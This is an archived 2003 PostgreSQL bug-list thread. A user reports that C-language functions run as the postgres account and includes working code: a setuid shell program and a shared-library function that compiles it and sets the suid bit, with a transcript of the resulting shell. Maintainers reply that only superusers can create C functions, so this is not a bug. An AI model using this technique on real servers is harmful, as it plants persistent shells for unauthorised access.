Quick Links

Re: "Bug" report - Serious (local shell)

Lists:	pgsql-bugs

From:	Diego Linke - GAMK <linke(at)calnet(dot)com(dot)br>
To:	pgsql-bugs(at)postgresql(dot)org
Subject:	"Bug" report - Serious (local shell)
Date:	2003-08-14 18:07:42
Message-ID:	20030814150742.6457e853.linke@calnet.com.br
Views:	Raw Message \| Whole Thread \| Download mbox \| Resend email
Lists:	pgsql-bugs

============================================================================
POSTGRESQL BUG REPORT TEMPLATE
============================================================================

Your name : Diego Linke
Your email address : gamk(at)gamk(dot)com(dot)br

System Configuration
---------------------
Architecture (example: Intel Pentium) : Intel

Operating System (example: Linux 2.0.26 ELF) : NetBSD 1.6.1_STABLE

PostgreSQL version (example: PostgreSQL-7.3.2): PostgreSQL-7.3.2

Compiler used (example: gcc 2.95.2) : 2.95.3 20010315

Please enter a FULL description of your problem:
------------------------------------------------

The problem is that postgresql when calls a function in external C, calls with user of the postgres.
A bad user will be able to create binary with shell suid for the user of postgres, and to assume the control of postgres (pg_hba.conf, bases, postmaster, at last everything that the user of postgres can make).
I presume that this problem has in all the versions of postgres. :p

See this example:

(work/ttyp2:/tmp/ja_era)> id
uid=1000(gamk) gid=100(users) groups=100(users),0(wheel),5(operator)
(work/ttyp2:/tmp/ja_era)> id pgsql
uid=1001(pgsql) gid=1000(pgsql) groups=1000(pgsql)
(work/ttyp2:/tmp/ja_era)> cat supg.c
main() {
setuid(1001);
setgid(1000);
system("/bin/sh");
}
(work/ttyp2:/tmp/ja_era)> cat func.c
#include <stdlib.h>

int execute(int x) {
system("gcc -o /tmp/ja_era/supg /tmp/ja_era/supg.c");
system("chmod a+x /tmp/ja_era/supg");
system("chmod u+s /tmp/ja_era/supg");
return(x+1);
}
(work/ttyp2:/tmp/ja_era)> cc -c -fpic func.c
(work/ttyp2:/tmp/ja_era)> cc -o func.so -shared func.o
(work/ttyp2:/tmp/ja_era)> psql teste
Welcome to psql 7.3.2, the PostgreSQL interactive terminal.

Type: \copyright for distribution terms
\h for help with SQL commands
\? for help on internal slash commands
\g or terminate with semicolon to execute query
\q to quit

teste=# CREATE FUNCTION execute (integer) RETURNS integer AS '/tmp/ja_era/func.so' LANGUAGE C;
CREATE FUNCTION
teste=# SELECT execute(5);
execute
---------
6
(1 row)
B

teste=# \q
(work/ttyp2:/tmp/ja_era)> ls -l supg
-rws--x--x 1 pgsql wheel 6029 Aug 14 08:41 supg*
(work/ttyp2:/tmp/ja_era)> ./supg
$ whoami
pgsql
$ id
uid=1000(gamk) euid=1001(pgsql) gid=100(users) groups=100(users),0(wheel),5(operator)
$ touch /tmp/teste
$ ls -l /tmp/teste
-rw-r--r-- 1 pgsql wheel 0 Aug 14 08:42 /tmp/teste
$

--
[ Diego Linke - GAMK ]
System/Network/Security Administrator
E-Mail/Site: gamk(at)gamk(dot)com(dot)br - http://www.gamk.com.br
Public Key: http://www.gamk.com.br/gamk.asc
Phone Number: (+5541) 9967-3464

From:	Stephan Szabo <sszabo(at)megazone(dot)bigpanda(dot)com>
To:	Diego Linke - GAMK <linke(at)calnet(dot)com(dot)br>
Cc:	<pgsql-bugs(at)postgresql(dot)org>
Subject:	Re: "Bug" report - Serious (local shell)
Date:	2003-08-14 18:46:47
Message-ID:	20030814114242.A90183-100000@megazone.bigpanda.com
Views:	Raw Message \| Whole Thread \| Download mbox \| Resend email
Lists:	pgsql-bugs

On Thu, 14 Aug 2003, Diego Linke - GAMK wrote:

> Your name : Diego Linke
> Your email address : gamk(at)gamk(dot)com(dot)br
>
> System Configuration
> ---------------------
> Architecture (example: Intel Pentium) : Intel
>
> Operating System (example: Linux 2.0.26 ELF) : NetBSD 1.6.1_STABLE
>
> PostgreSQL version (example: PostgreSQL-7.3.2): PostgreSQL-7.3.2
>
> Compiler used (example: gcc 2.95.2) : 2.95.3 20010315
>
> Please enter a FULL description of your problem:
> ------------------------------------------------
>

> The problem is that postgresql when calls a function in external C,
> calls with user of the postgres.
> A bad user will be able to create binary with shell suid for the user
> of postgres, and to assume the control of postgres (pg_hba.conf,
> bases, postmaster, at last everything that the user of postgres can
> make).

Only a bad database superuser should be able to do anything of the sort
because normal users shouldn't be allowed to use CREATE FUNCTION with C
language functions (it's untrusted), are you seeing something different?

From:	Tom Lane <tgl(at)sss(dot)pgh(dot)pa(dot)us>
To:	Diego Linke - GAMK <linke(at)calnet(dot)com(dot)br>
Cc:	pgsql-bugs(at)postgresql(dot)org
Subject:	Re: "Bug" report - Serious (local shell)
Date:	2003-08-14 19:22:43
Message-ID:	6915.1060888963@sss.pgh.pa.us
Views:	Raw Message \| Whole Thread \| Download mbox \| Resend email
Lists:	pgsql-bugs

Diego Linke - GAMK <linke(at)calnet(dot)com(dot)br> writes:
> The problem is that postgresql when calls a function in external C,
> calls with user of the postgres.

The ability to create C functions is reserved to superusers, for exactly
this reason. If you have the rights to make the backend execute
arbitrary C code, you hardly need a shell to do something nasty.

In short, this is not a bug. Don't give superuser privileges to people
you cannot trust.

regards, tom lane

From:	Diego Linke - GAMK <linke(at)calnet(dot)com(dot)br>
To:	Diego Linke - GAMK <linke(at)calnet(dot)com(dot)br>
Cc:	pgsql-bugs(at)postgresql(dot)org
Subject:	Re: "Bug" report - Serious (local shell)
Date:	2003-08-14 20:03:59
Message-ID:	20030814170359.495a807b.linke@calnet.com.br
Views:	Raw Message \| Whole Thread \| Download mbox \| Resend email
Lists:	pgsql-bugs

Hi Stephan,

>
> Only a bad database superuser should be able to do anything of the sort
> because normal users shouldn't be allowed to use CREATE FUNCTION with C
> language functions (it's untrusted), are you seeing something different?
>

I am sorry!
I really did not perceive that only one administrator could create functions in C.

Thanks for all.